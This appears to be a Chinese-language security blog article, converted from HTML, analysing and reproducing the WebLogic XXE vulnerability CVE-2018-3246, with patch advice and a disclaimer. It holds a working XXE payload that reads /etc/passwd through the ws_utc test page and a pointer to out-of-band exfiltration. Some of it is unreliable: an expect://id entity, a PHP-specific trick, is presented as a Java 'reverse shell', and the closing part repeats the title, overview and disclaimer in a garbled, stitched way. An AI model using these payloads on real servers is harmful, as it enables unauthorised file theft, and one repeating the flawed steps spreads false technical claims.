Weblogic XXE漏洞(CVE-2018-3246)分析与复现指南<\/h1>

漏洞概述<\/h2>
CVE-2018-3246是Oracle WebLogic Server中的一个XML外部实体(XXE)注入漏洞，存在于WebLogic Test Page组件中。攻击者可以通过构造恶意的XML文件，利用服务器对XML解析的不安全处理，实现任意文件读取或远程代码执行。<\/p>

漏洞影响<\/h2>

受影响版本<\/strong>：Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3<\/li>
漏洞类型<\/strong>：XML外部实体注入(XXE)<\/li>

CVSS评分<\/strong>：7.5 (High)<\/li> <\/ul>
漏洞原理分析<\/h2>
漏洞位于ws-testpage-impl.jar<\/code>文件中的importWsTestConfig<\/code>方法，具体路径为\/config\/import<\/code>。<\/p>
关键问题点：<\/p>
使用Unmarshaller<\/code>接口解析用户上传的XML文件时未禁用外部实体引用<\/li> 在JDK 6\/7环境下默认允许外部DTD引用，而WebLogic默认使用这些JDK版本<\/li> <\/ol> 漏洞代码片段：<\/p> public<\/span> ActionData execute<\/span>(<\/span>ActionData actionData)<\/span> {<\/span> <\/span><\/span> KeyValuesMap formParams =<\/span> (<\/span>KeyValuesMap)<\/span>actionData.<\/span>get<\/span>(<\/span>"request_form_data"<\/span>);<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> String fileName =<\/span> (<\/span>String)<\/span>formParams.<\/span>getFirstValue<\/span>(<\/span>"import_file_name"<\/span>);<\/span> <\/span><\/span> Unmarshaller Unmarshaller =<\/span> context.<\/span>createUnmarshaller<\/span>();<\/span> <\/span><\/span> TTestConfig tconfig =<\/span> (<\/span>TTestConfig)<\/span>Unmarshaller.<\/span>unmarshal<\/span>(<\/span>new<\/span> File(<\/span>fileName));<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Throwable e)<\/span> {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> return<\/span> actionData;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>漏洞复现步骤<\/h2> 环境准备<\/h3> 搭建存在漏洞的WebLogic环境（建议使用JDK 6或7）<\/li> 确保WebLogic Test Page组件可用（默认路径：\/ws_utc\/begin.do<\/code>）<\/li> <\/ol> 攻击步骤<\/h3> 访问上传页面<\/strong>：<\/p> http:\/\/[target]:[port]\/ws_utc\/begin.do <\/code><\/pre> <\/li> 准备恶意XML文件<\/strong>（以读取\/etc\/passwd为例）：<\/p> <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE root [ <\/span><\/span><\/span> <!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span>]> <\/span><\/span><root><\/span>&xxe;<\/root><\/span> <\/span><\/span><\/code><\/pre><\/li> 上传XML文件<\/strong>：<\/p> 将上述XML内容保存为test.xml<\/li> 通过上传接口提交文件<\/li> <\/ul> <\/li> 执行XXE攻击<\/strong>：<\/p> 如果环境允许，将直接返回文件内容<\/li> 如果无法回显，可尝试使用OOB(Out-of-Band)技术外带数据<\/li> <\/ul> <\/li> 反弹Shell（可选）<\/strong>：构造包含系统命令执行的XML文件：<\/p> <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE root [ <\/span><\/span><\/span> <!ENTITY xxe SYSTEM "expect:\/\/id"><\/span> <\/span><\/span>]> <\/span><\/span><root><\/span>&xxe;<\/root><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞修复方案<\/h2> 官方补丁<\/strong>：<\/p> 应用Oracle官方发布的最新安全补丁（2018年10月补丁）<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>：<\/p> 升级至JDK 8（默认禁用外部DTD）<\/li> 禁用WebLogic Test Page组件<\/li> 配置XML解析器禁用外部实体： Unmarshaller unmarshaller =<\/span> context.<\/span>createUnmarshaller<\/span>();<\/span> <\/span><\/span>unmarshaller.<\/span>setProperty<\/span>(<\/span>XMLConstants.<\/span>ACCESS_EXTERNAL_DTD<\/span>,<\/span> ""<\/span>);<\/span> <\/span><\/span>unmarshaller.<\/span>setProperty<\/span>(<\/span>XMLConstants.<\/span>ACCESS_EXTERNAL_SCHEMA<\/span>,<\/span> ""<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 网络层防护<\/strong>：<\/p> 在网络边界限制对WebLogic管理端口的访问<\/li> 部署WAF规则拦截XXE攻击特征<\/li> <\/ul> <\/li> <\/ol> 技术细节补充<\/h2> JDK版本影响<\/strong>：<\/p> JDK 6\/7：默认允许外部实体引用，漏洞可被利用<\/li> JDK 8：默认禁用外部DTD，可有效防御此漏洞<\/li> <\/ul> <\/li> 漏洞利用限制<\/strong>：<\/p> 需要知道上传文件的确切路径<\/li> 需要服务器有出网权限才能实现OOB数据外带<\/li> <\/ul> <\/li> 漏洞检测方法<\/strong>：<\/p> 发送测试XXE Payload并观察响应<\/li> 检查服务器日志中的XML解析错误<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> Oracle官方安全公告：https:\/\/www.oracle.com\/security-alerts\/cpuoct2018.html<\/li> 漏洞披露时间线：2018年10月16日由Oracle发布补丁<\/li> <\/ul> 免责声明<\/h2> 本文仅用于安全研究与教育目的。未经授权对他人系统进行测试或攻击是违法行为。使用者需自行承担由此产生的法律责任。<\/p>

Weblogic XXE漏洞(CVE-2018-3246)分析与复现指南<\/h1>

漏洞概述<\/h2> CVE-2018-3246是Oracle WebLogic Server中的一个XML外部实体(XXE)注入漏洞，存在于WebLogic Test Page组件中。攻击者可以通过构造恶意的XML文件，利用服务器对XML解析的不安全处理，实现任意文件读取或远程代码执行。<\/p>

漏洞复现步骤<\/h2>

免责声明<\/h2> 本文仅用于安全研究与教育目的。未经授权对他人系统进行测试或攻击是违法行为。使用者需自行承担由此产生的法律责任。<\/p>

漏洞概述<\/h2>
CVE-2018-3246是Oracle WebLogic Server中的一个XML外部实体(XXE)注入漏洞，存在于WebLogic Test Page组件中。攻击者可以通过构造恶意的XML文件，利用服务器对XML解析的不安全处理，实现任意文件读取或远程代码执行。<\/p>

免责声明<\/h2>
本文仅用于安全研究与教育目的。未经授权对他人系统进行测试或攻击是违法行为。使用者需自行承担由此产生的法律责任。<\/p>